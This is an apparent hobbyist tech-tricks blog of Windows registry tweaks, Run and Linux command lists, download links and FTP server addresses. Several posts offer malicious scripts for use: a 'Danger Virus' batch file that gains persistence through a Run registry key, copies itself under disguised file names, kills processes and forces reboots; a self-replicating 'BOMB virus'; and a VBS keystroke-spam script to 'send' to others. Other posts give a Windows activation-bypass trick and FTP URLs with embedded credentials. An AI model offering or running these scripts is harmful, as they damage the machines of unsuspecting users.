Sunday

Change Firefox View


If you are a firefox user and want to learn more and more about computer and internet, i have a cool firefox trick for you. You can open a firefox inside firefox. You can open as many firefox as you want.You can see the demo in the screenshot above.
Steps:
1. Open firefox browser.
2. copy and paste this code in the URL bar and press enter.
chrome://browser/content/browser.xul
3. now you will see the firefox inside the firefox.
4. if you want to open more then repeat the same as mant times as you want.

download virus effect remover | remove virus effect from your computer

Today i am going to write about a nice tool for your windows protection from malwares. It's name is Virus effect remover . This is a nice tool to remove all the common effects caused by viruses and other type of malwares. It helps you to monitor your system process and helps you to easily delete autorun.inf file from the system and removable media.

Features:

Remove Error: After cleaning virus from the system run this to unblock the virus infected tools such as task manager, registry editor cmd and many other windows tools.
Generate Process list:
Find Clone file:
unlock a file from a process:
delete a locked file:
block a specific virus:

This software enables your Admin restricted application and remove the changes which a virus does to protect itself.

It enables :
1: Registry Tools (e.g : regedit)
2: Task manager
3: Group Policy Editor (e.g. gpedit.msc)
4: Run command option in start Menu
5: Folder Option in Explorer & Control panel
6: Update check
7: File Menu
8: Find Menu
9: Log Off
10: Task Bar

It repairs :
1: Folder Option Show Hidden Tab
2: Folder Option Show Supper Hidden Tab

Requirement:

windows
DotNet framework

Saturday

Download Youtube videos as MP3 browser addons

Many times you want Mp3 songs for mobile or mp3 players. You can download videos from youtube by many downloaders and tricks. But you have to convert those videos to MP3 formats which can play in you mp3 player device. There is a better solution for that. You can directly download Mp3 from youTube. You need to download addon to your browser for that. You can also do the same by an online tool Video2Mp3 Media Converter. This online tool also available as addon to you firefox, chrome and safari web browser



Download firefox addon
http://www.video2mp3.net/firefox/youtube2mp3.xpi

Download chrome extension
http://www.video2mp3.net/chrome/youtubetomp3.crx

download safari extension
http://www.video2mp3.net/safari/Video2mp3.safariextz

How to Write-Protect USB Flash Drive

Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.
5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

How to Trace Any IP Address

just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.
1. Country in which the IP is located
2. Region
3. City
4. Latitude/Longitude
5. Zip Code
6. Time Zone
7. Name of the ISP
8. Internet Speed
9. Weather Station
10. Area Code and
11. Domain name associated with the IP address.

Friday

How To Convert Text Into Audio Using Notepad....

i am pasting one code. just pest it in the notepad and save it as anything.vbs

code:

Dim msg, sapi
msg=InputBox("ENTER THE TEXT–HACKPC0038.BLOGSPOT.COM","Text-To-Audio Converter by siddharth :)")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg


enjoy....

System hang at start up problem solve

1. Click on Start/Run, type 'msconfig', then click 'OK'.
2. Go
to the 'Services' tab, find the 'Background Intelligent Transfer'
service, disable it, apply the changes & reboot.

This
problem with the Background Intelligent Transfer Service should have
been corrected in Windows update Q 314862, part of Service Pack 1

Enjoy!!!!!!!!!!!!

Thursday

Balance Transfer of Vodafone.....

Vodafone recently introduced “Balance Transfer System” using which You can send & receive balances among ur friends & relatives. Only a small fee is deducted for the transfer.To SEND a balance: Dial *131*MRP*#To RECEIVE a balance: Dial *132*MRP*#
Note: 1) Prepaid customers can send or receive balance

Short Cut To restart pc!!!!!!!

Right click on your desktop & select shortcut
then one window will pop up then in the new window type
shutdown -r -t
r stands for restart & t stands for time in sec.
try it
you can make fool to anybody by changing the icon...

Wednesday

FTP server url

1. ftp://ftp.freenet.de/pub/filepilot/
2. ftp://193.43.36.131/Radio/MP3/
3. ftp://195.216.160.175/
4. ftp://207.71.8.54:21/games/
5. ftp://194.44.214.3/pub/music/
6. ftp://202.118.66.15/pub/books
7. ftp://129.241.210.42/pub/games/
8. ftp://clubmusic:clubmusic@217.172.16.3:8778/
9. ftp://212.174.160.21/games
10. ftp://ftp.uar.net/pub/e-books/
11. ftp://129.241.210.42/pub/games/
12. ftp://193.231.238.4/pub/
13. ftp://207.71.8.54/games/
14. ftp://194.187.207.98/video/
15. ftp://194.187.207.98/music/
16. ftp://194.187.207.98/soft/
17. ftp://194.187.207.98/games/
18. ftp://ftp.uglan.ck.ua/
19. ftp://159.153.197.74/pub
20. ftp://leech:l33ch@61.145.123.141:5632/
21. ftp://psy:psy@ftp.cybersky.ru
22. ftp://130.89.175.1/pub/games/
23. ftp://194.44.214.3/pub/
24. ftp://195.116.114.144:21/
25. ftp://64.17.191.56:21/
26. ftp://80.255.128.148:21/pub/
27. ftp://83.149.236.35:21/packages/
28. ftp://129.241.56.118/
29. ftp://81.198.60.10:21/
30. ftp://128.10.252.10/pub/
31. ftp://129.241.210.42/pub/
32. ftp://137.189.4.14/pub
33. ftp://139.174.2.36/pub/
34. ftp://147.178.1.101/
35. ftp://156.17.62.99/
36. ftp://159.153.197.74/pub/
37. ftp://193.140.54.18/pub/
38. ftp://192.67.63.35/
39. ftp://166.70.161.34/
40. ftp://195.161.112.15/musik/
41. ftp://195.161.112.15/
42. ftp://195.131.10.164/software
43. ftp://195.146.65.20/pub/win/
44. ftp://199.166.210.164/
45. ftp://195.46.96.194/pub/
46. ftp://61.136.76.236/
47. ftp://61.154.14.248/
48. ftp://62.210.158.81/
49. ftp://62.232.57.61/
50. ftp://212.122.1.85/pub/software/
51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

enjoy!!!!!!!!

Changing ANY user password without having to know the existing password!!!!!!

This
tweak gives a user the opportunity to use it for good or bad. It
enables the user to re-password any account without having to know the
existing password and also shows you every account that exists on the
machine (even the ones that are hidden). This is a good tool to use if
you forgot a password to say your administrator account and you needed
to be logged into the admin account for any reason.

To view all of the user accounts:

1) While logged onto the computer, click on Start>Run>and type in
CMD.

2)
From the command prompt window, type in net users. This will show you
every account that is made onto the computer whether it is hidden or
not.
enjoy!!!!!!!

Tuesday

Hide Your File in Image

First add your files to .rar and i.e. say files.rar
Say you have a image as img.jpg
Now, save files.rar and img.jpg in c:\ drive.
Click start >> Run
Type cmd
Now in command prompt type cd..
Again type cd..
Type copy /b img.jpg + files.rar new.jpg
hide your secreat things!!!!

Danger Virus

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%Greatgame > nul
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v Greatgame /t REG_SZ
/d %systemroot%Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P

Monday

LINUX COMMANDS

i have posted linux command for you so dnt forget to say thanks

a2p Creates a Perl script from an awk script.
ac Prints statistics about users' connect time.
alias Create a name for another command or long command string.
ar Maintain portable archive or library.
arch Display the architecture of the current host.
arp Manipulate the system ARP cache.
as An assembler.
at Command scheduler.
awk Awk script processing program.
basename Deletes any specified prefix from a string.
bash Command Bourne interpreter
bc Calculator.
bdiff Compare large files.
bfs Editor for large files.
bg Continues a program running in the background.
biff Enable / disable incoming mail notifications.
break Break out of while, for, foreach, or until loop.
bs Battleship game.
bye Alias often used for the exit command.
cal Calendar
calendar Display appointments and reminders.
cancel Cancels a print job.
cat View or modify a file.
cc C compiler.
cd Change directory.
chdir Change directory.
checkeq Language processors to assist in describing equations.
checknr Check nroff and troff files for any errors.
chfn Modify your own information or if super user or root modify another users information.
chgrp Change a groups access to a file or directory.
chkey Change the secure RPC key pair.
chmod Change the permission of a file.
chown Change the ownership of a file.
chsh Change login shell.
cksum Display and calculate a CRC for files.
clear Clears screen.
cls Alias often used to clear a screen.
cmp Compare files.
col Reverse line-feeds filter.
comm Compare files and select or reject lines that are common.
compress Compress files on a computer.
continue Break out of while, for, foreach, or until loop.
copy Copy files.
cp Copy files.
cpio Creates archived CPIO files.
crontab Create and list files that you wish to run on a regular schedule.
csh Execute the C shell command interpreter
csplit Split files based on context.
ctags Create a tag file for use with ex and vi.
cu Calls or connects to another Unix system, terminal or non-Unix system.
curl Transfer a URL.
cut Cut out selected fields of each line of a file.
date Tells you the date and time in Unix.
dc An arbitrary precision arithmetic package.
df Display the available disk space for each mount.
deroff Removes nroff/troff, tbl, and eqn constructs.
dhclient Dynamic Host Configuration Protocol Client.
diff Displays two files and prints the lines that are different.
dig DNS lookup utility.
dircmp Lists the different files when comparing directories.
dirname Deliver portions of path names.
dmesg Print or control the kernel ring buffer.
dos2unix Converts text files between DOS and Unix formats.
dpost Translates files created by troff into PostScript.
du Tells you how much space a file occupies.
echo Displays text after echo to the terminal.
ed Line oriented file editor.
edit Text editor.
egrep Search a file for a pattern using full regular expressions.
elm Program command used to send and receive e-mail.
emacs Text editor.
enable Enables / Disables LP printers.
env Displays environment variables.
eqn Language processors to assist in describing equations.
ex Line-editor mode of the vi text editor.
exit Exit from a program, shell or log you out of a Unix network.
expand Expand copies of file s.
expr Evaluate arguments as an expression.
fc The FC utility lists or edits and re-executes, commands previously entered to an interactive sh.
fg Continues a stopped job by running it in the foreground
fgrep Search a file for a fixed-character string.
file Tells you if the object you are looking at is a file or if it is a directory.
find Finds one or more files assuming that you know their approximate filenames.
findsmb List info about machines that respond to SMB name queries on a subnet.
finger Lists information about the user.
fmt Simple text formatters.
fold Filter for folding lines.
for

Shell built-in functions to repeatedly execute action(s) for a selected number of times.
foreach Shell built-in functions to repeatedly execute action(s) for a selected number of times.
fromdos Converts text files between DOS and Unix formats.
fsck Check and repair a Linux file system.
ftp Enables ftp access to another terminal.
getfacl Display discretionary file information.
gprof The gprof utility produces an execution profile of a program.
grep Finds text within a file.
groupadd Creates a new group account.
groupdel Enables a super user or root to remove a group.
groupmod Enables a super user or root to modify a group.
gunzip Expand compressed files.
gview A programmers text editor.
gvim A programmers text editor.
gzip Compress files.
halt Stop the computer.
hash Remove internal hash table.
hashstat Display the hash stats.
head Displays the first ten lines of a file, unless otherwise stated.
help If computer has online help documentation installed this command will display it.
history Display the history of commands typed.
host DNS lookup utility.
hostid Prints the numeric identifier for the current host.
hostname Set or print name of current host system.
id Shows you the numeric user and group ID on BSD.
ifconfig Sets up network interfaces.
ifdown take a network interface down
ifup bring a network interface up
isalist Display the native instruction sets executable on this platform.
jobs List the jobs currently running in the background.
join Joins command forms together.
keylogin Decrypt the user's secret key.
kill Cancels a job.
ksh Korn shell command interpreter.
ld Link-editor for object files.
ldd List dynamic dependencies of executable files or shared objects.
less Opposite of the more command.
lex Generate programs for lexical tasks.
link Calls the link function to create a link to a file.
ln Creates a link to a file.
lo Allows you to exit from a program, shell or log you out of a Unix network.
locate List files in databases that match a pattern.
login Signs into a new system.
logname Returns users login name.
logout Logs out of a system.
lp Prints a file on System V systems.
lpadmin Configure the LP print service.
lpc Line printer control program.
lpq Lists the status of all the available printers.
lpr Submits print requests.
lprm Removes print requests from the print queue.
lpstat Lists status of the LP print services.
ls Lists the contents of a directory.
mach Display the processor of the current host.
mail One of the ways that allows you to read/send E-Mail.
mailcompat Provide SunOS 4.x compatibility for the Solaris mailbox format.
mailx Mail interactive message processing system.
make Executes a list of shell commands associated with each target.
man Display a manual of a command.
mesg Control if non-root users can send text messages to you.
mii-tool View, manipulate media-independent interface status.
mkdir Create a directory.
mkfs Build a Linux file system, usually a hard disk partition.
more Displays text one screen at a time.
mount Disconnects a file systems and remote resources.
mt Magnetic tape control.
mv Renames a file or moves it from one directory to another directory.
nc TCP/IP swiss army knife.
neqn Language processors to assist in describing equations.
netstat Shows network status.
newalias Install new elm aliases for user or system.
newform Change the format of a text file.
newgrp Log into a new group.
nice Invokes a command with an altered scheduling priority.
niscat Display NIS+ tables and objects.
nischmod Change access rights on a NIS+ object.
nischown Change the owner of a NIS+ object.
nischttl Change the time to live value of a NIS+ object.
nisdefaults Display NIS+ default values.
nisgrep Utilities for searching NIS+ tables.
nismatch Utilities for searching NIS+ tables.
nispasswd Change NIS+ password information.
nistbladm NIS+ table administration command.
nmap Network exploration tool and security / port scanner.
nohup Runs a command even if the session is disconnected or the user logs out.
nroff Formats documents for display or line-printer.
nslookup Queries a name server for a host or domain lookup.
on Execute a command on a remote system, but with the local environment.
onintr Shell built-in functions to respond to (hardware) signals.
optisa Determine which variant instruction set is optimal to use.
pack Shrinks file into a compressed file.
pagesize Display the size of a page of memory in bytes, as returned by getpagesize.
passwd Allows you to change your password.
paste Merge corresponding or subsequent lines of files.
pax Read / write and writes lists of the members of archive files and copy directory hierarchies.
pcat Compresses file.
perl Perl is a programming language optimized for scanning arbitrary text files, extracting information from those text files.
pg Files perusal filters for CRTs.
pgrep Examine the active processes on the system and reports the process IDs of the processes
pico Simple and very easy to use text editor in the style of the Pine Composer.
pine Command line program for Internet News and Email.
ping Sends ICMP ECHO_REQUEST packets to network hosts.
pkill Examine the active processes on the system and reports the process IDs of the processes
poweroff Stop the computer.
pr Formats a file to make it look better when printed.
priocntl Display's or set scheduling parameters of specified process(es)
printf Write formatted output.
ps Reports the process status.
pvs Display the internal version information of dynamic objects within an ELF file.
pwd Print the current working directory.
quit Allows you to exit from a program, shell or log you out of a Unix network.
rcp Copies files from one computer to another computer.
reboot Stop the computer.
red Line oriented file editor.
rehash Recomputes the internal hash table of the contents of directories listed in the path.
remsh Runs a command on another computer.
repeat Shell built-in functions to repeatedly execute action(s) for a selected number of times.
rgview A programmers text editor.
rgvim A programmers text editor.
rlogin Establish a remote connection from your terminal to a remote machine.
rm Deletes a file without confirmation (by default).
rmail One of the ways that allows you to read/send E-Mail.
rmdir Deletes a directory.
rn Reads newsgroups.
route Show / manipulate the IP routing table.
rpcinfo Report RPC information.
rsh Runs a command on another computer.
rsync Faster, flexible replacement for rcp.
rview A programmers text editor.
rvim A programmers text editor.
s2p Convert a sed script into a Perl script.
sag Graphically displays the system activity data stored in a binary data file by a previous sar run.
sar Displays the activity for the CPU.
script Records everything printed on your screen.
sdiff Compares two files, side-by-side.
sed Allows you to use pre-recorded commands to make changes to text.
sendmail Sends mail over the Internet.
set Set the value of an environment variable.
setenv Set the value of an environment variable.
setfacl Modify the Access Control List (ACL) for a file or files.
settime Change file access and modification time.
sftp Secure file transfer program.
sh Runs or processes jobs through the Bourne shell.
shred Delete a file securely, first overwriting it to hide its contents.
shutdown Turn off the computer immediately or at a specified time.
sleep Waits a x amount of seconds.
slogin OpenSSH SSH client (remote login program).
smbclient An ftp-like client to access SMB/CIFS resources on servers.
sort Sorts the lines in a text file.
spell Looks through a text file and reports any words that it finds in the text file that are not in the dictionary.
split Split a file into pieces.
stat Display file or filesystem status.
stop Control process execution.
strip Discard symbols from object files.
stty Sets options for your terminal.
su Become super user or another user.
sysinfo Get and set system information strings.
sysklogd Linux system logging utilities.
tabs Set tabs on a terminal.
tail Delivers the last part of the file.
talk Talk with other logged in users.
tac Concatenate and print files in reverse.
tar Create tape archives and add or extract files.
tbl Preprocessor for formatting tables for nroff or troff.
tcopy Copy a magnetic tape.
tcpdump Dump traffic on a network.
tee Read from an input and write to a standard output or file.
telnet Uses the telnet protocol to connect to another remote computer.
time Used to time a simple command.
timex The timex command times a command; reports process data and system activity.
todos Converts text files between DOS and Unix formats.
top Display Linux tasks.
touch Change file access and modification time.
tput Initialize a terminal or query terminfo database.
tr Translate characters.
traceroute Print the route packets take to network host.
troff Typeset or format documents.
ul Reads the named filenames or terminal and does underlining.
umask Get or set the file mode creation mask.
unalias Remove an alias.
unhash Remove internal hash table.
uname Print name of current system.
uncompress Uncompressed compressed files.
uniq Report or filter out repeated lines in a file.
unmount Crates a file systems and remote resources.
unpack Expands a compressed file.
untar Create tape archives and add or extract files.
until Execute a set of actions while/until conditions are evaluated TRUE.
useradd Create a new user or updates default new user information.
userdel Remove a users account.
usermod Modify a users account.
vacation Reply to mail automatically.
vedit Screen-oriented (visual) display editor based on ex.
vgrind Grind nice program listings
vi Screen-oriented (visual) display editor based on ex.
vim A programmers text editor.
view A programmers text editor.
w Show who is logged on and what they are doing.
wait Await process completion.
wc Displays a count of lines, words, and characters in a file
whereis Locate a binary, source, and manual page files for a command.
while Repetitively execute a set of actions while/until conditions are evaluated TRUE.
which Locate a command.
who Displays who is on the system.
whois Internet user name directory service.
write Send a message to another user.
X Execute the X windows system.
xfd Display all the characters in an X font.
xlsfonts Server font list displayer for X.
xset User preference utility for X.
xterm Terminal emulator for X.
xrdb X server resource database utility.
yacc Short for yet another compiler-compiler, yacc is a compiler.
yes Repeatedly output a line with all specified STRING(s), or 'y'.
yppasswd Changes network password in the NIS database.
zcat Compress files

Create your Virus

hi here i have post virus coding

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it.

Sunday

Show specification of PC

Tricks To View Full Specification Of Your PC

Just Go to Run
Type dxdiag
Click Enter

Then You Can View All PC Specifications..

Please Make a Comment If You Like This Post

speed up PC

To increase system performance and keep
the GUI:

1. Right click my computer.
2. Click
properties.
3. Click advanced.
4. Click settings (under
performance).
5. Click Adjust for best performance.
6. Scroll to the bottom and check the last one "use visual styles on
windows and buttons”. NOTE: This will switch XP to Classic View

Multiple Columns for the Start Menu

We started with the Start button, right? So, let us end this session with the same ☺ .To make
Windows use multiple Start Menu Columns (like Windows 95), do the following registry
hack. Open Registry Editor (Start Run regedit). Go to the key: HKEY_LOCAL
_MACHINE\Software\Microsoft\WindowsCurrentVersion\Explorer\Advanced. Right click
on the right window pane and create a string value StartMenuScrollPrograms. Set the value
to FALSE. To get the old setting simply change the value to True or delete the key . New
wine in the old bottle, ehh??

Enjoy

Saturday

Hide recycle bin

Open
Regedit & explore:
If you are using the XP style start menu
[i]--->HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\

if working with the classic menu:
--->HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu\

Inside, Make new DWORD-Value with the name "{645FF040-5081-101B-9F08-00AA002F954E}"
& 'Modify' Value "1"

That will just hide the Recycle bin icon,
--->If a Dock is installed, by this procedure the 'Recycle bin'
Docklet won't be anyhow affected as by some other Tweaks.

To restore the desktop icon again, --->just 'Modify' the
same DWORD-Value to "0" [/i]

enjoy!!!

File attributes in Windows Explorer

In Windows Explorer, when you click on the detailed mode, you do not see the file attributes
any more. If you want to enable this setting, do this:In regedit, navigate to
HKEY_CURRENT_USER\Software\Microsft\Windows\CurrentVersion\Explor\Advanced
and look for key ShowAttribCol. If you do not find it , then create a new DWORD key
ShowAttribCol and set its value to 1 to enable it.
enjoy!!!!!

Friday

Avoid Reactivation on XP Reinstall

On activating your copy of Windows XP operating system, a file gets updated in windows
/system32 directory. It is called wpa.dbl. If you need to reinstall, take a backup of this file
and once you have reinstalled the OS, just copy it back to the same directory. This way you
can avoid reactivation hurdles.

Enjoy!!!!!!!!!!

Mouse Trick – Better Mouse Acceleration

"Open registry and navigate to HKEY_CURRENT_USER\Control Panel\Mouse and set value of 'SmoothMouseXCurve' and 'SmoothMouseYCurve' as follows:..."

Thursday

Mouse Trick – Better Mouse Acceleration

Open registry and navigate to HKEY_CURRENT_USER\Control Panel\Mouse and set
value of "SmoothMouseXCurve" and "SmoothMouseYCurve" as follows:
"SmoothMouseXCurve"=hex:00,00,00,00,00,00,00,00,00,a0,00,00,00,00,00,00,00,40,01,00,0
0,00,00,00,00,80,02,00,00,00,00,00,00,00,05,00,00,00,00,00
"SmoothMouseYCurve"=hex:00,00,00,00,00,00,00,00,66,a6,02,00,00,00,00,00,cd,4c,05,00,0
0,00,00,00,a0,99,0a,00,00,00,00,00,38,33,15,00,00,00,00,00

Enjoy!!!!!!!!!!

Increase Internet Download Connections

This trick increase Simultaneous Internet Download Connections
and increases the number of allowed simultaneous connections to a higher number. The
default value is only five connections.
Navigate to the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
Right click on the window pane and create a DWord key with the name
“MaxConnectionsPer1_0Server” as it is without quotes. Set the value to a higher number
like 0000000a. Note that they are zeros and not alphabet ‘O’.
Right click on the window pane and create another DWord key with the name
“MaxConnectionsPerServer”. No quotes please. Set the value to a higher number like
0000000a. Note that they are zeros and not alphabet ‘O’.
enjoy!!!!!!!!!!!!!!!!!!

Wednesday

CD Writer is Not Fast Enough..?

Open My Computer, right-click the CD Drive icon, and then click Properties. Click the
Recording tab to display the settings. Under "Select a write Speed" Choose the "Fastest". If
still having a problem, then choose a speed like 18x or a medium speed. This will resolve
almost all the issues.
enjoy!!!!!

Don’t want the “Open With” Option..?

Each application's subkey in HKEY_CLASSES_ROOT\Applications controls whether that
particular application will show up on the dialog box. If you want to ban a particular program
from the Open With dialog box, look for the application's subkey underneath
HKEY_CLASSES_ROOT\Applications, add a String value named NoOpenWith, and leave
the value blank. There will be no more “Open With” menu for that item.
enjoy!!!!!!

Tuesday

Faster Network Access

When you use My Network Places to browse for other machines on your network, Windows
XP first checks for the scheduled tasks on the target machine before listing the shared
resources present on the computer. We can do a registry hack to avoid this delay. Invoke the
Registry Editor by typing regedit at the command line. Open the following
Registrykey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\RemoteComputer\NameSpace. Delete the following key {D6277990-4C6A-11CF-
8D87-00AA0060F5BF}. Now close the Registry and reboot.

enjoy!!!

Speed up IE Start Up

This tweak tells Internet Explorer to simply 'run', without loading any webpages. If
you use a 'blank' page, that is still a page, and slows access. Notice the 'about:blank' in
the address bar. The blank html page must still be loaded. To load IE with 'nothing'
[nothing is different than blank]:
1. Right-click on any shortcut you have to IE
[You should create a shortcut out of your desktop IE icon, and delete the original
icon]
2. Click Properties
3. Add -nohome [with a space before the dash] after the endquotes in the Target field.
4. Click OK
enjoy!!!!!!

Monday

Internet Explorer As Fast As FireFox

Open registry editor by going to Start then Run and entering regedit. Once in registry,
navigateto key HKEY_CURRENT_USER\Software\microsoft\Windows\ Current
Version \InternetSettings. Right click on the right windows > New > DWORD. Type
MaxConnectionsPerServer > You can set value (the more higher the no, the more
good speed eg:99). Create another DWORD >type MaxConnectionsPer1_0Server.
Then put a high value as mentioned above. Restart I.E and you are done.

Enjoy!!!!!!

Turn Off System Beeps

Go to HKEY_CURRENT_USER\Control Panel\Sound, and find the Beep and
ExtendedSounds String values. Set each value to No. Exit the Registry and reboot.
The beeps will no longer sound. Hey, your XP is no longer noisy!!

Sunday

Pop Up a Message at Start Up

To pop a banner which can contain any message you want to display just before a user
is going to log on, go to the key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System.
Now create a new string Value in the right pane named LegalNoticeCaption and enter
the value that you want to see in the Menu Bar. Now create yet another new string
value and name it LegalNoticeText. Modify it and insert the message you want to
display each time Windows boots. This can be effectively used to display the
company's private policy each time the user logs on to his NT box.

enjoy!!!!!!!

A Flying Start for the Start Menu

A simple Registry tweak can give speed up your start menu and sub-menus. Open the
Registry Editor, and navigate to and select:
HKEY_CURRENT_USER\Control Panel\Desktop .
Double-click the MenuShowDelay icon on the right, and change 'Value data' from its
default of 400 (milliseconds) to something speedier, like 0. When you have finished,
press Enter.
Enjoy!!!!!!!

Saturday

Stop Error Messages from Displaying on Startup

If you constantly see an error message that you can't get rid offor example, from a
piece of software that didn't uninstall properly and continues to give errors on
startupyou can disable it from displaying on startup. Run the Registry Editor and go to
HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Windows. (This
key holds a variety of Windows system settings, such as the location of your system
directory.) Create a new DWORD called NoPopupsOnBoot and give it a value of 1.
Exit the Registry and reboot for the setting to take effect. To disable it, either delete
the DWORD value or give it a value of 0.

enjoy!!!

Automatically Killing Tasks on Shutdown

You know the drill. You start to shut down the computer, you wait a few moments,
and then you see a dialog box asking if you want to kill an application or service that
is running. Instead of prompting you, you can make Windows XP take care of the kill
task automatically. Here's how:
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
3. Highlight the value AutoEndTasks and change the value to 1.
4. Close the Registry Editor

Friday

Best virus in notepad

here i am posting one coding paste it in notepad & save it as anything.bat

@echo off
title VIRUS
color 06

echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTACTING ANTI-VIRUS....
pause
echo DO YOU WANT TO DELETE VIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS.....
echo VIRUS ACTIVATED!!!!
pause
:1
dir/s
goto 1

BOMB virus

BOMB virus

@echo off
copy 0% ms32.bat
start ms32.bat

copy this code in notepad
save as bomb.bat
n run at ur risk......it will open multiple windows all u cn do is only restart ur system.

Run Commands

A
Accessibility Controls - access.cpl

Accessibility Wizard - accwiz

Add Hardware Wizard - hdwwiz.cpl

Add/Remove Programs - appwiz.cpl

Administrative Tools - control admintools

Adobe Acrobat (if installed)- acrobat

Adobe Designer (if installed)- acrodist

Adobe Distiller (if installed)- acrodist

Adobe ImageReady (if installed)- imageready

Adobe Photoshop (if installed) - photoshop

Automatic Updates - wuaucpl.cpl


B


Bluetooth Transfer Wizard - fsquirt


C


Calculator - calc

Certificate Manager - certmgr.msc

Character Map - charmap

Check Disk Utility - chkdsk

Clipboard Viewer - clipbrd

Command Prompt - cmd

Component Services - dcomcnfg

Computer Management - compmgmt.msc

Control Panel - control


D


Date and Time Properties - timedate.cpl

DDE Shares - ddeshare

Device Manager - devmgmt.msc

Direct X Control Panel (If Installed)* - directx.cpl

Direct X Troubleshooter - dxdiag

Disk Cleanup Utility - cleanmgr

Disk Defragment - dfrg.msc

Disk Management - diskmgmt.msc

Disk Partition Manager - diskpart

Display Properties - control desktop

Display Properties - desk.cpl

Display Properties (w/Appearance Tab Preselected) - control color

Dr. Watson System Troubleshooting Utility - drwtsn32

Driver Verifier Utility - verifier


E


Event Viewer - eventvwr.msc


F


Files and Settings Transfer Tool - migwiz

File Signature Verification Tool - sigverif

Findfast - findfast.cpl

Firefox (if installed) - firefox

Folders Properties - control folders

Fonts - control fonts

Fonts Folder - fonts

Free Cell Card Game - freecell



G


Game Controllers - joy.cpl

Group Policy Editor (XP Prof) - gpedit.msc


H



Hearts Card Game - mshearts

Help and Support - helpctr

HyperTerminal - hypertrm



I


Iexpress Wizard - iexpress

Indexing Service - ciadv.msc

Internet Connection Wizard - icwconn1

Internet Explorer - iexplore

Internet Properties - inetcpl.cpl

Internet Setup Wizard - inetwiz

IP Configuration (Display Connection Configuration)- ipconfig /all

IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns

IP Configuration (Release All Connections) - ipconfig /release

IP Configuration (Renew All Connections) - ipconfig /renew

IP Configuration (Refreshes DHCP & Re-Registers DNS) - ipconfig /registerdns

IP Configuration (Display DHCP Class ID) - ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid


J


Java Control Panel (If Installed) - jpicpl32.cpl

Java Control Panel (If Installed) - javaws



K


Keyboard Properties - control keyboard


L


Local Security Settings - secpol.msc

Local Users and Groups - lusrmgr.msc

Logs You Out Of Windows - logoff


M


Malicious Software Removal Tool - mrt

Microsoft Access (if installed) - access.cpl

Microsoft Chat - winchat

Microsoft Excel (if installed) - excel

Microsoft Frontpage (if installed) - frontpg

Microsoft Movie Maker - moviemk

Microsoft Paint - mspaint

Microsoft Powerpoint (if installed) - powerpnt

Microsoft Word (if installed) - winword

Microsoft Syncronization Tool - mobsync

Minesweeper Game - winmine

Mouse Properties - control mouse

Mouse Properties - main.cpl



N


Nero (if installed) - nero

Netmeeting - conf

Network Connections - control netconnections

Network Connections- ncpa.cpl

Network Setup Wizard - netsetup.cpl

Notepad - notepad

Nview Desktop Manager (If Installed) - nvtuicpl.cpl


O


Object Packager - packager

ODBC Data Source Administrator - odbccp32.cpl

On Screen Keyboard - osk

Opens AC3 Filter (If Installed)- ac3filter.cpl

Outlook Express - msimn



P


Paint - pbrush

Password Properties - password.cpl

